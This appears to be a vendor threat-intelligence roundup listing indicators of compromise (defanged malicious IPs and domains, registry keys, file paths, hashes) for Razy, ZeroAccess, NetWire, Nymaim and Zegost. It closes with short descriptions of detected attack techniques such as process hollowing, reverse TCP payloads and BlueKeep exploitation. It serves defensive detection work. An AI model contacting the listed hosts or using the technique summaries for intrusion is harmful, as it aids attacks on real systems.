b17be49bfd3fd9c159572f84e50972a6e792489b1cf9586f60031acdc7b7326e
c6f8cfebac72b8ca1adfe79b6352f000ec4d087c31890f93ff374a60359537d8
c78cd8ab3c96dc4e5cfaf3aa3da37cd0263b6977f36ab615ac3a272694f96c77
cec17d18abe51c7794fe304ea02199cd4bf0553cd323e9256abdd1f9fc889f0f
d2bacd82151b08ff05c00e8e5ac49fc826c968e37d2a94d941d90496d2e23a29
d372e71670e701a43bbcb501aaa394b5c3738480a4fef1be1539e4bbd5698ab8
d40dc49d3f14440272333c1d8406b4c2f7b3f1adbf3f41aad80de391731a4e45
d8aa1da48e23fab421bf6a809ae6a0659ce17cffcfed93b87dd8f652da8db5a5
db48af6b49297bf04b8a7748c92f0f22dc3d4fc86e503be3026991cdb9e1e0fb
ddb711bc29c0786371eac22df934818464ac71fa37950e8d1b7533903faba632

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Packed.Razy-9863698-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 33
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
142[.]250[.]64[.]78 27
172[.]67[.]144[.]180 17
172[.]67[.]221[.]206 17
104[.]21[.]62[.]78 16
104[.]21[.]73[.]114 9
172[.]217[.]197[.]102 7
172[.]217[.]165[.]142 5
172[.]217[.]197[.]113 4
172[.]217[.]197[.]100/31 4
172[.]217[.]197[.]138/31 3
142[.]250[.]80[.]14 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
w[.]google[.]com 33
zipansion[.]com 33
onizatop[.]net 33
www3[.]l[.]google[.]com 6
www[.]cha42rxiwf[.]com 1
www[.]wtkbdqroxe[.]com 1
www[.]hgk08awyds[.]com 1
www[.]ehj389ne16[.]com 1
www[.]c6nrdhzxi1[.]com 1
www[.]xvo2euhqmk[.]com 1
www[.]zm9kpxsjcb[.]com 1
www[.]kafibeiecu[.]com 1
www[.]cnbv59fqfq[.]com 1
www[.]8yqdtvj2t8[.]com 1
www[.]dmydqbrhdf[.]com 1
www[.]q7brxid3f4[.]com 1
www[.]l8qh7mmqbb[.]com 1
www[.]0eyjqc3hut[.]com 1
www[.]o3ryk56eev[.]com 1
www[.]14edaabmua[.]com 1
www[.]xfet9c3n6m[.]com 1
www[.]ct0dgfuzuc[.]com 1
www[.]jfv2ulx2pa[.]com 1
www[.]rh4wazn7ur[.]com 1
www[.]0370udez7n[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%System32%\Tasks\Google_Trk_Updater 33
<malware cwd>\old_<malware exe name> (copy) 23

File Hashes

00457cdc7ed99c2bd5da7d920974953da7097b2091ec3ce29cf147b0c71f6d9e
02705044ad7f3e2fcfcd2f3a21e9ff538a7157acfc93611b76ee084abd5280f0
03a2e8abeb4af03314e21e6f4ae66c03615b1b2f969153e78a3a2e65483bd4b8
048790eae555ab92041cfcd93f4cc85af3fa9d65cf89af0b69b5ea84badb53dc
069364b79c1ebd9816eea2e1ea5bef9df037c52d9727272ddaa83c4202ef3e62
0863a64003fca36b4ee5ca6f766271622d0fa87a829bfc108f803e52e9f45c04
0935d4192da228b682ac72f7dfd18bab9d74e6d0e13f386fc5e40486817f2c7a
0cc2aee498860d18c015a21c88682ced988e8ab0c889d17864482f2c5482b48b
0ffc4ddd5345fc2761eb2bf98786c6c702a86b8fc9c7fb836beaf4afe0c76315
1117efd67b7a101f5b64487a7e7d97216528a3011b58b92a4820bc66f0a137ad
116d9767521ef64409db2d2eae9b4e9d6801ffeb3a870c8fff852a424c98ed6d
1221cf486b3e31360a67a1991c75d64a2522cded5760e63bc8707226820c69bd
147b6efb15d8c6786a9de4742ee6f55dbb3026f37ed5c81f96848994a1c12902
14dfd28ad056967d119e289ce7791aff443770b68752fad1bc1d37f979335a19
14ece2497e355e7257cb5a74d17b441cb466d3e69c02803e66585eb3a88ffd0c
269794f62313a446ecd56df226066fa71621c4653abd11fab67e1830083fb711
26fce45d8e94f41ab63b448736b11e45b8e9f70ebc9440f93a2bf1499638acf8
27a14cc5cd7f7ec0cbdc12637475ba149ba70694831bb669bc38dd9a629e0f3d
2924ac682308a31306513708a8711e6c386252147a7fd113d0cfffee6f2fb9ae
29f4807e0e1f451b02932e045f1ffe0ef6823974e2c616cc451d5dd435e7f9e0
2dd9dfc0dd76b8380efa33bb30762d1332b57a330fa7d9f6ac648f63506dba17
2e4c867110c1b7c9fe359c812c8dce43cfaa02c0d94dd73ca35ed97428dff795
2f3eca1d7a6cb1227cf502abe1c0231aca1742c6b80d883cbb833af0b6d0db08
321ad99af1eb54d8e5bd4034e4bb47655c18a5f26a5d2649c1dcfe8cc947d9bc
3224774c22f96c2b24a89ed1b123802877eb2dc5a1ee4fd2dcc25820bf110853

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Packed.ZeroAccess-9863627-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: DeleteFlag 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Start 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Start 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: DeleteFlag 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start 		23
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32
Value Name: ThreadingModel 		23
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender 		23
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32 23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: DeleteFlag 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Type 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Type 		23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: ErrorControl 		23
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
113[.]253[.]61[.]63 23
75[.]64[.]3[.]137 23
190[.]113[.]132[.]177 23
24[.]112[.]60[.]78 23
38[.]121[.]20[.]199 23
93[.]114[.]72[.]243 23
87[.]22[.]20[.]205 23
74[.]127[.]32[.]226 23
71[.]193[.]1[.]178 23
92[.]114[.]2[.]93 23
66[.]233[.]105[.]136 23
36[.]3[.]96[.]243 23
181[.]29[.]104[.]243 23
203[.]194[.]105[.]252 23
188[.]17[.]1[.]7 23
173[.]170[.]51[.]17 23
196[.]44[.]165[.]30 23
128[.]71[.]232[.]241 23
144[.]122[.]22[.]37 23
70[.]120[.]215[.]41 23
107[.]18[.]192[.]234 23
173[.]178[.]127[.]48 23
188[.]7[.]0[.]51 23
95[.]58[.]232[.]230 23
78[.]34[.]37[.]230 23

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
j[.]maxmind[.]com 23
Files and or directories createdOccurrences
%System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de8 23
\$Recycle.Bin\S-1-5-18 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@ 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U 23
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@ 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U 23
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n 23
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@ 23
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n 23

File Hashes

1f7b39c7503c4f6e6c0806ce67f29c84d2a416d248deb45e51eaeccde6664e75
398880c256a44d0b9b8724bbedc01d47c7e8914ab5489b6ba243d18f2ed7c005
4c25e907646d6269448df4de17405b23fa7a247d5c73d9a317aa56be1fc8d732
520e3dc06a5af9695e40b868d77bf24acb7bb9b6667a9d75dd8eaa4568705194
57f9d3755c18bf6eba02e3be1ae28099f3b7da43fe2492b8c5b3a707cfb75b08
59c040576d9bdb610d9d084a762f7799901188edeb5b60562f38746baecf40e1
63601d9fcff879000b2f115eca0198e203f4d2d42f1aca927e269366052f22f3
6cad5cefed9cb7ba3ce7716866e6e5b0ecff41ed00439b190e2e22d5840bf403
7097e5b4b441b0ef511e033f11bc42e57086149991b54fda135692c8690e9454
814f0c69e1effa1219ab9042cbc974299c7155d992f082423181409cb5d6d12b
8177f6f633d42aab791116bb38a5eb106b44cecf0a5bf9b19c75aa80f165b3e5
85acb5ed2e20e14f99656ed67dfde0b06258a396ecd9f636fbdc294fb7d741f2
957b4adf7b31fff360ee9c8e109bbe5bfd4a1c1e9c73c6655fbed8ec7a6f5612
9f5e73c65d5ae8a77885cc6ad3bdd0fb3083d655797033fe77421e477f427ca9
b4e4815a26145182cd4501c0536d8a4b95c151b6125ba3aa9962e5ad11a5ad88
b7eb5b44844936e36f88712e654f2fb31a5590a545f31884abe454f4d64f5a10
b8a9047ddbcedbb5af7daad44473a8a430f27ed74660025dd5f7eab1fe6432cd
bea5028e98d653cd619295bf6f890a0e6b1a97d8406dc45bdaf2fb653d590456
df3c6991a653596dc2853f7e3423118f001246e460c8363ccd71379d4edcca69
eac1b6e6ae5c947be49092a1bd7136d0aeea0bf4517a8da8020d548787d06f3f
f13e38c4631fb3ab7c2796ba2a9f5a74783d6140b8c02668c7c530588910d120
f40f85ce54fc8efd1832df3cf00c6e51112d4c63ad324abc79746d81a873ad75
f633f16bd47490da6955962daa1f2bd8290eeafb06d64d057dfb1f3afd3e9810

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Dropper.NetWire-9863651-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 46 samples
MutexesOccurrences
- 46
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pinojesu[.]mooo[.]com 46
Files and or directories createdOccurrences
\TEMP\.Identifier 46
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cdce.vbe 46
%APPDATA%\dsder 46
%APPDATA%\dsder\cdce.exe 46

File Hashes

00b714b92f056b8e5310b4343d3635930c474d90ff2a73411675f643074e9535
05749048ec24f9c5edd2ce65eefeb5c192cb654fb98c7b3815fa334de49da8b4
090c81982088eb702fe29911e6ec6835123d49db9d2fcc2d3ac43243eaceb48c
09344c5a7c3dfa2657141c3faeb791d7acea063153e1c118c7d9b2289290b0c7
0aad2e8a559b1a0814f52e721caf76834cc53b3790b2dc34ee12aabc566eb64f
103834f28a239176189534ff2428c50a6466e6a4a3e3edc8639941a0334499bd
1253ec7ffa1d52510bebeec84b4111ab61a7e3abfe54687853785d8ee1789821
141ffa5fecebc8adf9bcdf0d183c3ffdda86b63fc98025b3c989b635ac13ab84
14384af92d0399b38be569b6e0c16ecd950512f4dab8c5e03791cff263cc2680
175f8b976792a203c5a001778fc2bd6fb5f575b2a86c0efbc54a3c8b2716bb38
184ae1e3b7fa25cb77b8bb77bec1b869be8649cecd6eabe6521f2c40f1311a5d
18f738f8f9ed9ae253592ce7654d6c248111776571915185e679eefb4906656a
2a63faa01e9a03882eee8e02e48e9adf2d7f54d87e87c8cb2b3e86868d12fcdf
2c7ca93c76b20457f48b976f00a51629511397762318f136c0da8b88f34cbf87
2e84d0e0c14c3ef6654dd6c79032c4b7bff6a78c1d17a1cf4b31a81ac5d448ef
305c084ca0332e66346d6be8535b34ef20b6d01383a429e1e24a82f69f640cf9
3245436af0bf9fe8a6bdabe32535b377316f55c7df42a4efa61f2fd4216af02f
35687be42c81df0cb455f357231742a4237cdb3ac424a2286202fbd89ce2ceaf
36a89b010e737d53baa7f515d78452319015832931419d50bc953e2e383e9bc0
3ee3cbe123a6813cff586a2b26037682663b4ed83f12140933826c0acd1a6567
4939d495b210904de73969839f231ac54e577510b2cb3ea6b4ee80fc30f86559
4eced40d60807a5e00e5b687ab56e367b18da7f4f3bd8a7f1d15197928379e5e
503a464ba69410f2421d21052d4b226614ffaf22bce43614216d6fc39fbab673
511ad4b1e261b821187ec0621f06bba6328540c0731944ad088337facd51a25e
52d9f1a8e323cea78fcfd7f7ad506223c33ab1487787be90e662c6f6b2f727a0

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Malware.Nymaim-9863762-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 23
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg 		23
MutexesOccurrences
Local\{1181F583-B634-69BF-E703-D4756599024F} 23
Local\{180BBEAD-0447-044A-68BD-247EB6D0E352} 23
Local\{18DD7903-1E96-FEAF-92BF-014008A1248C} 23
Local\{92502033-C012-7F46-D6A8-0AC972DF6662} 23
Local\{25754F3F-7A37-56CA-31BB-3C9D33DA226B} 23
Local\{8B75523D-CAF4-D06B-A2AD-13EEF593AC52} 23
Local\{D2CC4CCA-CB77-CF10-8293-17C78DEC853F} 23
Local\{1EA3A258-3864-6872-1468-8BA744C17F27} 23
Local\{DE0F7AA2-5496-FCDD-E937-21A8DE4174A9} 23
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
microsoft[.]com 23
google[.]com 23
qzipvlwdcjnj[.]in 23
ldmnuirtqbzk[.]net 23
gteezde[.]in 23
zssqd[.]net 23
uayabgnamb[.]pw 23
ptxwa[.]net 23
vejxhna[.]in 23
xhwbu[.]com 23
ffxoiqxtj[.]in 23
vslenfe[.]net 23
cqoodn[.]in 23
pfwtlegdenhd[.]net 23
hfjzahvrbxfe[.]in 23
shfdcsev[.]net 23
szgaoxo[.]net 23
glpmczyn[.]in 15
zbxjurwwvsr[.]pw 15
uhqqpsd[.]com 15
ksouer[.]net 15
xywqu[.]net 15
nghrfzc[.]in 15
lklbc[.]pw 15
axfcr[.]com 15

*See JSON for more IOCs

Files and or directories createdOccurrences
%ProgramData%\ph 23
%ProgramData%\ph\fktiipx.ftf 23
%TEMP%\gocf.ksv 23
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> 23
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%ProgramData%\jzk\icolry.ylg 20
%TEMP%\qnvgtx.eww 20
%TEMP%\ylw.vrd 1
\Documents and Settings\All Users\am\oatuqzx.bpc 1

File Hashes

046380ec9c8cafae0be2d27b6141945ec155a8bb4d42733a875d76ecb5f61bfd
05accc657f21cf95371fd18ab4a3688ff274004bfd8ea9a69a1fd62560544297
176493823fea77c6f94afeb96a3f9d837f98876ec2ed2584f160e9804e01217a
1c275114a1c745e1cfb70a255c1ba5743b3ea21248ef278c7257cffa9a65030b
21780c34e475d147d0e5fbcd144baedf2e243c1b4106e80cf65797fb9822f140
32daffb03e097063db58f6a5a3a26b2e2b1e2d4637e43329259a286b3e247f05
361bdecc71535a7adafd9d7715f9b8b8614a8c2d427957f2302bead8e08df551
395684c6dd90fa77232977171cd15b00c57947f979aec23ecd9cccf962020d65
57005828054f7d3b2a57d5eb6b0d0efc38fd97ffab5ffcf088442d63eb571caa
6cfc140580bd45e97c2c9346760fd2756f87d584013cce42aefb7f56f5323a78
6e2ee7b17f2ca88f8cecb37494af68809f9f9be3d62a043b822f24e49a02aeb6
743b9d92308fa6c55fd4db340ad0aebd751b5687ae829f19b14615d8f04079e1
7a8af359251b3abe01732e256b7a3884bca92652f2a16b1d3f987cdd86109724
97346121e6c11f9b79d478b6d66fbe0d27a8e16417359f7284598534f3588e03
a86bc42783d228d7cda13431f1352f88ba5d469323f00045834dcee4a7b36d0f
bb2e7a8fa7497cf9eb3ff6431b7e1f487417fe2aadebe77d5099f6c6d6aef6d7
be778e5c3436f89631a55ce551d080a7fb120d067643a047a70a226cce662e2c
bf4b5325cb621e14867fbb321986b4392a833b7ee49e84cb7d57736f0df155fd
c093082328179325e05237c0341a1d02bb7dc22c56e65e44bb9d599994c5a878
d6368d959796033480138d441651f33ae580d53867251d379cbbf901ea904177
d76eccd9b5acb753cb0f79f1c30b778334065d3ea469c4aa85f794e7effdc44d
e0affd9aa38ddd07d3646edb47c1c97d14cfe8a469a3691ec03cf056a5574a54
e99482d2cb992d121436de75b43610103cadd9b666a13b8290f82f04867d102a
f94ed27c29d4f2a55b9f4db8d3b25d5dc03e9dfd70a4057c14ee73b1c149dfff
fb471dd3267412d5f80ea9dbe64f889d4f1cfd5b873158d660138999e256b51a

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Win.Trojan.Zegost-9863903-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\GROUP\GROUP
Value Name: Group 		12
<HKLM>\SYSTEM\GROUP 12
<HKLM>\SYSTEM\GROUP\GROUP 12
MutexesOccurrences
V1dXHmpoaVhXV1ceQ19dIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 3
EREQHhIUKR4SERMeFhYgERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 2
ERIVHigUHhcpHhEoFSA=ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
alhBXkdYQV8VEhAeQ14gERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
ERATHhQQHhEQEh4RFSkgERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
UVETKBATERcUHkVZQ1AeXkVUIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
EREoHhESEx4RERYeERYSIA==VyhcKR5GExMSEh5eRVQgERIXHhAeEB4RIA== 1
EREoHhEpEx4SEBUeESkWIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
ERATHhITEB4REhEeEhATIA==ERIXHhAeEB4RIA==ERIXHhAeEB4RIA== 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
110[.]249[.]213[.]66 2
125[.]84[.]79[.]185 1
103[.]40[.]102[.]159 1
118[.]193[.]205[.]196 1
103[.]230[.]121[.]203 1
125[.]32[.]170[.]209 1
118[.]123[.]116[.]162 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]zxyhwww[.]com 3
zhanghao520[.]cn 1
qq3803174[.]eicp[.]net 1
w8l9[.]f3322[.]net 1
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Windows\Start Menu\Xnv.url 11
%APPDATA%\Microsoft\Windows\Start Menu\Xnz.url 11

File Hashes

0509525c0c3bcc7d20528f16328e61da0d0aee1658819851da808eb2ab5a9859
2113be2e203f417f6dfcf56d129f016079c37b6307ff1f23bb4a858504ed831c
24c01ab1a8b7f8b02600adf21608d88ec8e7633aada8447c3f9b2bef7d915620
48301f0b0a00836fb2c2f21b8a134f51cc3b77bd15ededc44c1aa333817fa129
5af051c39d32680bc43b574e54fc267a175ffb07e9fa91432a053fa1c00d5abb
7a26e2b1bc5938981611a3ce8e2f039c5cbfb5142455ccce83d82ad53b2fa30a
99174b0fd701555ceb803415e229a16db2a4a8365cf78d53e0dd7bc1d3f0efb2
aa59b38825eff8755532cd5bd4d8d7787df9d0e9307afc51f9361bff1a3191a8
ac55558c4056132e4f2e32dd026d92e7c8128549719361bbe90ca6fb0cf6b1fa
ac88356ce284f6ac53a3c7d2012d541ef750829cd7220e265b2e6f0befd8f9ef
ee6f3fbe504bba2d110d00bfceea11950ebffab33ef1aeadc975688c7ae8e973
f09cf8f6e814201773dcead015aef2fa72b96698d1ccc7c160b34e6e2e79aee3

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (10061)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (4737)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Reverse tcp payload detected - (3026)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
Crystalbit-Apple DLL double hijack detected - (1480)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Squiblydoo application whitelist bypass attempt detected. - (841)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Kovter injection detected - (633)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
A Microsoft Office process has started a windows utility. - (594)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Trickbot malware detected - (519)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Dealply adware detected - (400)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (121)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.